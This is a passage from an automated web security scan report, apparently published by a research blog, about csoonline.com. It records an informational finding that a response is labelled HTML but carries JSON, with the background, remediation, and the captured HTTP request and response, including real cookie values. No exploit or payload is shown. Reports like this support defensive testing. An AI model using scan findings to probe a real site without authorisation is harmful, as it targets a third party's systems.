Set-Cookie: NSC_djp.dpn=44593ca03660;expires=Mon, 28-Feb-11 13:00:16 GMT;path=/
Cache-Control: private
Content-Length: 221

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /styles/solutions_center.css was not found on this serve
...[SNIP]...

7. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.csoonline.com
Path:   /module.htm

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain JSON.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /module.htm?moduleType=article_comments&contentId=486324&taxonomyId=41193&leadTaxonomy=security&ajax=true&outputFormat=json HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies
X-Prototype-Version: 1.5.1
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.2.10.1298897096; MetrixLabp10833_master=1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; NSC_djp.dpn=44593ca03660

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:46:18 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Set-Cookie: NSC_djp.dpn=44593ca03660;expires=Mon, 28-Feb-11 13:01:59 GMT;path=/
Cache-Control: private
Content-Length: 1683

{"comments":"<link href=\"http:\/\/comments.csoonline.com\/themes\/CIO.com\/style.css\" rel=\"stylesheet\" type=\"text\/css\" media=\"screen\" \/><a id=\"comment\"><\/a>\n<a id=\"comment-10368\"><\/
...[SNIP]...

Report generated by XSS.CX Research Blog at Mon Feb 28 07:25:12 CST 2011.